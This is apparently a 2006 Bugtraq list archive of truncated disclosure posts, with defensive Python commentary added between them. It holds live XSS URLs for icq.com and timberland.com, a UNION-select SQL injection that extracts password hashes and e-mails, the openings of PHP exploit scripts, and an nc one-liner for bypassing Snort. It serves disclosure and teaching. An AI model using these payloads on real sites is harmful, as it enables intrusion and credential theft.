XSS in ICQ.com

2006-06-04 Thread sn4k3 . 23
Hello, there's a XSS Bug in www.ICQ.com http://www.icq.com/boards/atoz.php?letter=oOOoOooOOOoO%3Cscript%3Ealert%28%27www.SR-Crew.de.tt%27%29%3C/script%3E

SMS "messages.php" SQL injection

2006-06-04 Thread CrAzY . CrAcKeR
=== Discovery By: CrAzY CrAcKeR Site: www.alshmokh.com I want to thank my friend:- nono225-mHOn-rageh-LoverHacker-BoNy_m Brh-Rootshil-LiNuX_rOOt-SauDiVirUS === Example:- /messages.php?id=[SQL] ===

New <

2006-06-04 Thread Max Moser
Muts & I like to announce a new and stable release of "<< BackTrack". This project is a merger of two well-known security penetration testing focused linux live distributions (Whax and Auditor). After hundreds of combined man hours, we can provide you with the finest linux and windows tools on

Timberland Search XSS Vulnerability

2006-06-04 Thread try_og
There's a vulnerability in Timberland's search engine. The variable 'keywords' in searchHandler/index.jsp is not correctly sanitized. URL: hxxp://www.timberland.com/searchHandler/index.jsp?keywords=[XSS Code] Example: hxxp://www.timberland.com/searchHandler/index.jsp?keywords=alert('test');
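Both the ICQ and Timberland reports above are the same bug class: a query parameter reflected into the HTML response without encoding. The following is an added example, not code from either site or from the posters; the hostname, parameter name and page template are placeholders. It pulls the parameter out of a URL shaped like the posted ones, shows the raw reflection, and shows the HTML-body encoding that neutralizes the payload.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Constructed request URL in the same shape as the ones posted above; the
# host and parameter name are placeholders, not the affected sites.
SAMPLE_URL = ("http://search.example.invalid/index.jsp"
              "?keywords=boots%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E")


def keywords_from_url(url: str) -> str:
    """Return the URL-decoded 'keywords' parameter, as the server-side code sees it."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return params.get("keywords", [""])[0]


def render_vulnerable(keywords: str) -> str:
    """Echo the raw parameter into the HTML body: the reported behaviour."""
    return "<p>Results for: " + keywords + "</p>"


def render_fixed(keywords: str) -> str:
    """Encode for the HTML-body context before reflecting the parameter."""
    return "<p>Results for: " + html.escape(keywords, quote=True) + "</p>"


def contains_script_tag(page: str) -> bool:
    """Crude check used here to show the difference: did a live <script> survive?"""
    return "<script>" in page.lower()
```

`html.escape` is correct only for text placed in the HTML body; a parameter reflected inside an attribute value or a JavaScript string needs the encoder for that context, and a strict `Content-Security-Policy` is the backstop when a page forgets.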

Re: Fire fox dos exploit

2006-06-04 Thread Aaron Hopkins
On Wed, 31 May 2006, Josh Zlatin-Amishav wrote: Can you give us some more details, like versions and platforms affected? I was unable to recreate this flaw using firefox 1.5.dfsg+1.5.0 on Debian unstable. The word-wrapping of his mail client broke the exploit. If you clean that up by only pu

Re: Fire fox dos exploit

2006-06-04 Thread Ronald van den Blink
OK, we've tested this one (see http://www.securityview.org/firefox-marquee-bug.html) because at first we weren't able to let FF crash. The results are on the site, but the bug is well known and it is not more than an annoying thing. All the credit goes to n00b for making the PoC, but

VMSA-2006-0001 - VMware ESX Server Cross Site Scripting issue

2006-06-04 Thread VMware Security Team
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - --- VMware Security Advisory Advisory ID: VMSA-2006-0001 Synopsis: VMware ESX Server Cross Site Scripting issue VMware ESX 2.

Re: phpFoX All Version Login Exploit

2006-06-04 Thread purefan
Hello. This issue has been solved already and should not work since the whole log in system has been improved. Thank you for sharing

Re: Internet explorer Vulnerability

2006-06-04 Thread Hariharan
I see this work in Explorer and my IE 7 beta; both of them crash. But this does not seem to be easily exploitable. It is a simple stack buffer overrun issue. The problem seems to be in inetcomm!CActiveUrlRequest::ParseUrl. Now inetcomm seems to have been compiled with the GS flag, hence the ove

Re: Fire fox dos exploit

2006-06-04 Thread Phil Trainor
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 I was able to use this proof of concept code with the following results: With Firefox 1.0.8 (Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.13) Gecko/20060418 Fedora/1.0.8-1.1.fc4 Firefox/1.0.8) I was able to cause a resource exhaustion with firefox i

Re: Re: Fire fox dos exploit

2006-06-04 Thread vincenzo . ampolo
Yep. I can confirm this for firefox 1.5.0.3 on ubuntu dapper amd64. Filing a bug report

Re: Fire fox dos exploit

2006-06-04 Thread Yannick von Arx
Under Apple Mac OS X 10.4.6 (PPC) with Firefox 1.5.0.3 it's reproducible! Cheers, Yannick von Arx On 31.05.2006 at 16:50, Josh Zlatin-Amishav wrote: On Tue, 30 May 2006, [EMAIL PROTECTED] wrote: I have found a problem which causes denial of service on fire fox browser Can you give us s

Re: Fire fox dos exploit

2006-06-04 Thread Ronald van den Blink
I told this guy already that it looks like WinXP is the problem. Mac OS X and Debian (Linux) do not hang! With regards, Ronald van den Blink Securityview.org On 31 May, 2006, at 16:50, Josh Zlatin-Amishav wrote: On Tue, 30 May 2006, [EMAIL PROTECTED] wrote: I have found a problem whic

RE: Fire fox dos exploit

2006-06-04 Thread Andy
Crashed my FF 1.5.0.3 straight away on a fully patched XP Pro Service Pack 2 Andy -Original Message- From: Josh Zlatin-Amishav [mailto:[EMAIL PROTECTED] Sent: 31 May 2006 16:50 To: [EMAIL PROTECTED] Cc: bugtraq@securityfocus.com Subject: Re: Fire fox dos exploit On Tue, 30 May 2006, [EM

Re: Fire fox dos exploit

2006-06-04 Thread pagvac
Successfully tested on Firefox 1.5.0.3. I had to kill my firefox.exe process after half a minute of freezing :-) On 30 May 2006 12:03:36 -, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote: I have found a problem which causes denial of service on fire fox browser Credit: to n00b for finding th

Re: [Info Disclosure] Diesel PHP Job Site Latest Version

2006-06-04 Thread John F Flynn III
As a systems administrator, I must say that your methods are unacceptable. You are violating your customers' trust by doing this without their knowledge. You even made an effort to hide the code that sends the information! This is outright deceit and should not be tolerated by anyone. Regardl

Re: OaBoard 1.0 Remote File inclusion

2006-06-04 Thread Botan Rizgar
http://evuln.com/vulns/3/exploit.html look :]

Re: WBB<--v2.3.4"misc.php" SQL injection Vulnerability

2006-06-04 Thread nukedx
Sorry, but I didn't see any SQL injection with your example. I tried all ways and did not get any result or error from the SQL server. Could you please show me the injection that you found, and the vulnerable code in misc.php? Regards, Mustafa Can Bjorn IPEKCI

LifeType <=1.0.4 'articleId' SQL injection

2006-06-04 Thread rgod
#!/usr/bin/php -q -d short_open_tag=on http://retrogod.altervista.org\r\n";; echo "dork: \"Powered by LifeType\" \"RSS 0.90\" \"RSS 1.0\" \"RSS 2.0\" \"Valid XHTML 1.0 Strict and CSS\"\r\n\r\n"; /* works regardless of magic_quotes_gpc settings */ if ($argc<3) { echo "Usage: php ".$argv[0].

DotClear <= 1.2.4 'blog_dc_path' (php5) arbitrary remote inclusion

2006-06-04 Thread rgod
#!/usr/bin/php -q -d short_open_tag=on http://retrogod.altervista.org\r\n\r\n";; echo "dork: \"propulsé par DotClear\" \"fil atom\" \"fil rss\" +commentaires\r\n\r\n"; /* works with PHP5 register_globals=On, allow_url_fopen=On */ if ($argc<5) { echo "Usage: php ".$argv[0]." host path ft

Re: New Snort Bypass - Patch - Bypass of Patch

2006-06-04 Thread M. Dodge Mumford
[Sorry to reply to my own post, but...] M. Dodge Mumford said: > Sigint Consulting said: > > perl -e 'print "GET \x0d/index.php\x90\x90 HTTP/1.0\n\r\n"'|nc > > 192.168.1.3 80 > > > > No alert is generated from the string above. > > [...] > > > We are not sure how much this may buy an attacker a
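The quoted bypass request line puts a CR between the method and the path and appends two 0x90 bytes to it. Below is an added illustration, not Sigint Consulting's or the Snort project's code, of why a raw byte-pattern match misses that request while a match on a normalized request line does not. The signature string is an assumed stand-in (the post does not quote the actual rule), and the normalization rules, that a run of whitespace or control bytes acts as one separator and that non-printable bytes are dropped from the URI, are assumptions about a tolerant server rather than a description of Snort's HTTP preprocessor.

```python
import re

# Assumed signature: a stand-in for whatever rule content the post was testing.
SIGNATURE = b"GET /index.php"

# Request line quoted in the post (a CR before the path, two 0x90 bytes after
# it) and a plain request for comparison.
BYPASS = b"GET \x0d/index.php\x90\x90 HTTP/1.0\n\r\n"
PLAIN = b"GET /index.php HTTP/1.0\r\n\r\n"


def naive_match(raw: bytes) -> bool:
    """Byte-for-byte content match on the unnormalized request."""
    return SIGNATURE in raw


def normalize_request_line(raw: bytes) -> bytes:
    """Rebuild the request line the way a lenient server plausibly reads it.

    Assumptions (not from the post): any run of ASCII control bytes or
    whitespace between tokens is a single separator, and bytes outside the
    printable ASCII range are dropped from the URI.
    """
    first = raw.split(b"\n", 1)[0]
    tokens = [t for t in re.split(rb"[\x00-\x20]+", first) if t]
    if len(tokens) < 2:
        return b""
    method, uri = tokens[0], tokens[1]
    uri = bytes(b for b in uri if 0x21 <= b <= 0x7E)
    version = tokens[2] if len(tokens) > 2 else b""
    return b" ".join(t for t in (method, uri, version) if t)


def normalized_match(raw: bytes) -> bool:
    """Match the signature against the normalized request line instead."""
    return SIGNATURE in normalize_request_line(raw)
```

The detection-side lesson is the one the thread is circling: a signature only holds if the sensor normalizes the request the same way the target server parses it, so any gap between the two parsers is a bypass.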

[SECURITY] [DSA 1089-1] New freeradius packages fix arbitrary code execution

2006-06-04 Thread Martin Schulze
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - -- Debian Security Advisory DSA 1089-1 [EMAIL PROTECTED] http://www.debian.org/security/ Martin Schulze June 3rd, 2006

[MajorSecurity #7]dotWidget CMS <= 1.0.6 - Remote File Include Vulnerability

2006-06-04 Thread admin
[MajorSecurity #7]dotWidget CMS <= 1.0.6 - Remote File Include Vulnerability - Software: dotWidget CMS Version: <=1.0.6 Type: Remote File Include Vulnerability Date: June, 2nd 2006 Vendor: dotWidget P

phpBB2 (template.php) Remote File Inclusion

2006-06-04 Thread canberx
Title: phpBB2 Remote File Include. Credit: Canberx. Thanx: Forewer-Partizan. Mail: [EMAIL PROTECTED] www.canberx.tk. Google Dork: Powered by phpBB © 2001, 2002 phpBB Group. Exploit:

LocazoList Classifieds <= v1.05e(viewmsg.asp) Remote SQL Injection Vulnerability

2006-06-04 Thread ajannhwt
# Title : LocazoList Classifieds <= v1.05e(viewmsg.asp) Remote SQL Injection Vulnerability # Author : ajann #Vulnerability; $$$ http://[target]/[path]/viewmsg.asp?msgid= SQL TEXT $$$ Example: http://[target]/[path]/viewmsg.asp?msgid=-1%20union%20select%20epass,0,0,0,email,0,0,0,0,0,0
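The posted payload is a classic UNION-based injection: a non-existent id so the original query returns nothing, then a UNION whose column count matches the page's SELECT, with the password hash and e-mail placed in the columns the page renders. The following is an added example, not LocazoList's code; it uses a constructed SQLite schema (the table and column names other than `epass` and `email` are assumptions) to show the concatenated query falling to a payload of the same shape, and the integer-validated, parameterized version rejecting it.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed sample schema standing in for the classifieds database."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE messages (msgid INTEGER, subject TEXT, body TEXT, sender TEXT);
        CREATE TABLE users (uid INTEGER, email TEXT, epass TEXT);
        INSERT INTO messages VALUES (1, 'Bike for sale', 'Good condition', 'alice');
        INSERT INTO users VALUES (1, 'alice@example.invalid', 'hash-of-alice-password');
    """)
    return con


# Same shape as the posted payload: an id that matches nothing, then a UNION
# with as many columns as the original SELECT, the interesting ones placed
# where the page prints them. 'users' is an assumed table name.
PAYLOAD = "-1 union select epass,0,0,email from users"


def view_msg_vulnerable(msgid: str) -> list:
    """Concatenates msgid into the statement, as viewmsg.asp appears to do."""
    con = build_db()
    sql = "SELECT msgid, subject, body, sender FROM messages WHERE msgid=" + msgid
    return con.execute(sql).fetchall()


def view_msg_fixed(msgid: str) -> list:
    """Validates the id as an integer and binds it as a parameter."""
    if not msgid.strip().lstrip("-").isdigit():
        raise ValueError("msgid must be an integer")
    con = build_db()
    sql = "SELECT msgid, subject, body, sender FROM messages WHERE msgid=?"
    return con.execute(sql, (int(msgid),)).fetchall()


def fixed_rejects(msgid: str) -> bool:
    """True when the hardened lookup refuses the input."""
    try:
        view_msg_fixed(msgid)
    except ValueError:
        return True
    return False
```

Parameter binding alone stops the injection; the integer check on top of it turns a malformed id into a clean error instead of a database round-trip, and is the cheap check to add on every numeric identifier in the application.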

Re: # MHG Security Team --- MyBloggie 2.1.1 version Remote File Include Vulnerabilit

2006-06-04 Thread nukedx
This is not vulnerable. PHP-Nuke has a special in its files, and when it includes mainfile.php it overwrites the global variables, which causes an arbitrary file inclusion. But in MyBloggie there is no common vulnerability like it. I checked all files and all versions and did not see any vul

Blackhat USA 2006 - Review , remarks and proposal agenda

2006-06-04 Thread [EMAIL PROTECTED]
The Blackhat agenda for the USA 2006 session has just been published: URL. The first remark is that this year, Blackhat USA will be an incredible briefing! There will be several zero-day announcements. For example: Brendan O'Conn

[SECURITY] [DSA 1088-1] New centericq packages fix arbitrary code execution

2006-06-04 Thread Martin Schulze
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - -- Debian Security Advisory DSA 1088-1 [EMAIL PROTECTED] http://www.debian.org/security/ Martin Schulze June 3rd, 2006

Critical SQL Injection in CoolForum

2006-06-04 Thread gmdarkfig
Type: SQL Injection Risk: Critical Product: CoolForum <= 0.8.3 beta Vulnerability * // File: editpost.php // Line 38 // if(isset($_REQUEST['post'])) $post = intval($_REQUEST['post']); else $post = 0; -- // Line 77 // $canedit = getrighted

[ECHO_ADV_32$2006] SCart 2.0 Remote Code Execution

2006-06-04 Thread eufrato
[ASCII-art banner; no text content survived extraction]

[SECURITY] [DSA 1087-1] New PostgreSQL packages fix encoding vulnerabilities

2006-06-04 Thread Martin Schulze
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - -- Debian Security Advisory DSA 1087-1 [EMAIL PROTECTED] http://www.debian.org/security/ Martin Schulze June 3rd, 2006

Pixelpost <= 1-5rc1-2 multiple vulnerabilities

2006-06-04 Thread rgod
#!/usr/bin/php -q -d short_open_tag=on http://retrogod.altervista.org\r\n";; echo "dork: pixelpost \"RSS 2.0\" \"ATOM feed\" \"Valid xHTML / Valid CSS\"\r\n\r\n"; /* works with: magic_quotes_gpc=Off */ if ($argc<5) { echo "Usage: php ".$argv[0]." host path your_ip cmd OPTIONS\r\n"; echo